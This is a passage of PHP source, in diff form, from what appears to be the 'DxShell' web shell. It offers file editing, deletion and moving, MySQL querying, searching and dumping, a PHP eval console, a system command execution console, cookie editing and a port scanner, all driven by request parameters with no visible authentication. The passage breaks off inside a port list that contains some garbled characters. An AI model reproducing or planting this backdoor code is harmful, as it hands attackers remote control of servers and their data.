(!is_writable($_GET['dxfile'])) die(DxError('File is not writable. Perms?...')); + if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed')); + if (fputs($f, $_POST['dxparam'])===FALSE) die(DxError('I/O: File write failed')); + fclose($f); + print 'File saved OK;'; + } + else + { + if (!is_readable($_GET['dxfile'])) die(DxError('File is not readable. Perms?...')); + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>'; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>'; + print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>'; + print "\n".'</form>'; + } + } + +######## +######## File Delete +######## +if ($_GET['dxmode']=='F_DEL') + { if (isset($_GET['dx_ok'])) + { if ($_GET['dx_ok']=='Yes') + { if ( (is_file($_GET['dxfile']) AND !unlink($_GET['dxfile'])) OR (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile'])) ) + print DxError('Unable to delete file. Perms?...<br>'); + else + { print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + } + else + { + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxfile'); + print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>' + ."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?' + ."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>' + ."\n".'</td></tr></table>'; + print "\n".'</form>'; + } + } + +######## +######## File Rename +######## +if ($_GET['dxmode']=='F_REN') + { + if (isset($_POST['dxparam'])) + { + if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam'])) + print DxError('Unable to rename. Perms?...<br>'); + else + { + print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + else + { + print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>'; + print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">'; + print "\n".'<input type=submit value="Rename" class="submit"></form>'; + } + } + +######## +######## File Copy +######## +if ($_GET['dxmode']=='F_COP') + { + if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))')); + + $newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3); + if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */ + $newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos); + print $newname; + if (!copy($_GET['dxfile'], $newname)) + print DxError('Unable to copy. Perms?...<br>'); + else + { + print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile']))); + } + } + +######## +######## File Move +######## +if ($_GET['dxmode']=='F_MOV') + { + if (isset($_POST['dxparam'])) + { + if (!rename($_GET['dxfile'], $_POST['dxparam'])) + print DxError('Unable to rename. Perms? Or no path?...<br>'); + else + { + print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>'; + DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam']))); + } + } + else + { + if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!'); + print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>'; + print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">'; + print "\n".'<input type=submit value="M0ve" class="submit"></form>'; + } + } + +if (substr($_GET['dxmode'],0,2)=='F_') + {/* file actions */ + print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>'; + } + + ################################### + +######## +######## SQL Maintenance +######## +if ($_GET['dxmode']=='SQL') + { if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'])) + { print "\n".'<h2>MySQL connection</h2>'; + print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>'; + DxGETinForm('leave', 'dxmode'); + print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">'; + print "\n".'<br>Login:<input type=text name="dxsql_l" value="" style="width:200pt">'; + print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" style="width:200pt">'; + print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>'; + die(); + } + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + $mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()")); + print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true); + for ($i=0;$i<count($DATABASES);$i++) + $DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false)); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0>' + .'<tr><td class=h2_oneline><h1>DB:</h1></td>'; + if (!isset($_GET['dxsql_d'])) + { + print "\n".'<td class=h2_oneline style="border-width:0pt;">'; + print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p'); + print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">'; + print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>'; + for ($i=0;$i<count($DATABASES);$i++) + print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">' + .'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0] + .'</OPTION>'; + print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>'; + print "\n".'</tr></table>'; + die(); + } + else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>' + .'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>' + .'</tr></table>'; + + if (!empty($_GET['dxsql_d'])) + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + if (!empty($_GET['dxsql_d'])) + { + print "\n\t".'<table border=0 cellspacing=0 cellpadding=0>'; + print "\n\t".'<caption>Tables:</caption>'; + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>'; + } + print "\n\t".'</table>'; + } + print "\n".'</td><td width=100%>'; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;'; + print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit value="Query" class="submit"> ' + .'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>' + .'<br>'; + + if (empty($_POST['dxsql_q'])) die('</td></tr></table>'); + $_POST['dxsql_q']=explode(';', $_POST['dxsql_q']); + + foreach ($_POST['dxsql_q'] as $CUR_Q) + { if (empty($CUR_Q)) continue; + $CUR_Q.=';'; + + $num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false); + if ($num<=0) continue; + + print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>'; + + $INDEXES=array_keys($FETCHED[0]); + print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>'; + print "\n\t".'<tr><td class="listing"><div align=center class="highlight_txt">###</td>'; + foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>'; + print '</tr>'; + + for ($l=0;$l<count($FETCHED);$l++) + { + print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>'; + for ($i=0; $i<count($INDEXES); $i++) + print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>'; + } + + print "\n".'</table><br>'; + } + print "\n".'</td></tr></table>'; + } + +######## +######## SQL Search +######## +if ($_GET['dxmode']=='SQLS') + { + if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d'])) die(DxError('SQL server/login/password/database are not set')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>'; + print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + + if (isset($_POST['dxsqlsearch']['txt'])) + if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']); + + print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>'; + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); + if ($TRowCnt[0][0]>0) + print "\n\t".'<OPTION value="'.$TABLES[$i].'" ' + .( (isset($_POST['dxsqlsearch']['tables']))? ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'') :'SELECTED' ).'>' + .$TABLES[$i].'</OPTION>'; + } + print "\n\t".'</SELECT>'; + print "\n".'</td><td width=100%>'; + print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">'; + print "\n".'<br>'; + foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad) + print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" ' + .( (isset($_POST['dxsqlsearch']['mode']))? (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'') :(($cur_rad=='Any')?'CHECKED':'') ) + .' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;'; + print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>'; + print "\n".'</form>'; + + if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>'); + + if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected')); + + if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt'])); + else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']); + + + $GLOBALFOUND=0; + foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE) + { $Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE '; + $Q_ARR=array(); + DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true); for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0]; + foreach ($COLS as $CUR_COL) + { if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact'))) + { for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++) + $Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"'; + } + else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0]; + + if ($_POST['dxsqlsearch']['mode']=='each') + { $Q_ARR_EXACT[]=implode(' AND ', $Q_ARR); + $Q_ARR=array(); + } + } + if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';'; + if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );'; + if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );'; + + /* $Q is ready */ + + if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0) + { + $GLOBALFOUND+=$num; print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>'; + print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>'; + for ($l=0;$l<count($FETCHED);$l++) + { + print "\n\t".'<tr>'; + for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>'; + print '</tr>'; + } + print "\n".'</table><br>'; + } + } + print "\n".'<br>Total: '.$GLOBALFOUND.' matches'; + + print "\n".'</td></tr></table>'; + } + +######## +######## SQL Dump +######## +if ($_GET['dxmode']=='SQLD') + { if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d'])) die(DxError('SQL server/login/password/database are not set')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>'; + print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + + print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>'; + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); + if ($TRowCnt[0][0]>0) + print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>'; + } + print "\n\t".'</SELECT>'; + print "\n".'</td><td width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):'; + print "\n".'<input type=text name="dxsql_q" style="width:100%;">'; + print "\n".'<br>'; + print "\n".'<div align=right>' + .'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10) + .'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>'; + print "\n".'</form>'; + } + + ################################### + +######## +######## PHP Console +######## +if ($_GET['dxmode']=='PHP') + { + if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval']; + + print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">'; + $PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']); + for ($i=0; $i<count($PRESETS);$i++) + print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>' + .( ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3) ); + print "\n\n".'</td></tr></table><br><br>'; + + if (isset($_POST['dxval'])) + if (strpos($_POST['dxval'], 'dxpreset__')===0) + { $_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__')); + if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset')); + $_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']]; + } + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>'; + print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>'; + print "\n".'</form>'; + if (isset($_POST['dxval'])) + { print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n"; + eval($_POST['dxval']); + print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>'; + } + } + + ################################### + +######## +######## Cookies Maintenance +######## +if ($_GET['dxmode']=='COOK') + { + if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =('); print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s'); + + print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>'; + for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--) + { + if ($maxlen>100) $maxlen=100; + if ($maxlen<30) $maxlen=30; + $maxlen+=3; + for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++) + { + if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;} + print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>' + .'<td class=linelisting><input type=text ' + .'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $INDEXES[$i]).']" ' + .'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" ' + .'SIZE='.$maxlen.'></td>' + .'</tr>'; + } + if (!$look_len) + { + print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>'; + print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>' + .'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>' + .'</tr>'; print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">' + .'<input type=submit value="Save" class="submit" style="width:50%;">' + .'</td></tr>'; + } + } + print "\n".'</table></form>'; + } + + ################################### + +######## +######## Command line +######## +if ($_GET['dxmode']=='CMD') + { + print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>'; + print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">'; + print "\n\t".'<OPTION></OPTION>'; + $PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']); + for ($i=0; $i<count($PRESETS);$i++) + print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>'; + print "\n\n".'</SELECT></td></tr></table><br><br>'; + + if (isset($_POST['dxval'])) + if (strpos($_POST['dxval'], 'dxpreset__')===0) + { + $_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__')); + if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset')); + $_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']]; + } + + $warnstr=DxExecNahuj('',$trash1, $trash2); + if (!$warnstr[1]) DxWarning($warnstr[2]); print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit value="Exec" class="submit" style="width:100pt;"> ' + .'</div>'; + print "\n".'</form>'; + if (isset($_POST['dxval'])) + { + $_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval'])); + for ($i=0; $i<count($_POST['dxval']); $i++) + { + $CUR=$_POST['dxval'][$i]; + if (empty($CUR)) continue; + + DxExecNahuj($CUR,$OUT, $RET); + print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n"; + + print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>'; + print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>'; + print '<br><nobr>'; + print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".( (is_array($RET))?implode("\n", $RET):$RET).'</textarea>'; + print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".( (is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>'; + print '</nobr>'; + print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>'; + } + } + } + + ################################### + +######## +######## String functions +######## +if ($_GET['dxmode']=='STR') + { + if (isset($_POST['dxval'], $_POST['dxparam'])) + { $crypted=''; + if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']); + if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']); + if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']); + if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']); + if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']); + if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' '; + if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));} + if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');} + if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']); + if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']); + } + if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = '; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5) + .'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> ' + .'</div>'; + print "\n".'</form>'; + } + +######## +######## Port scaner +######## +if ($_GET['dxmode']=='PRT') + { + print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>'; if (isset($_POST['dxportscan']) or isset($_GET['dxparam'])) + $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm 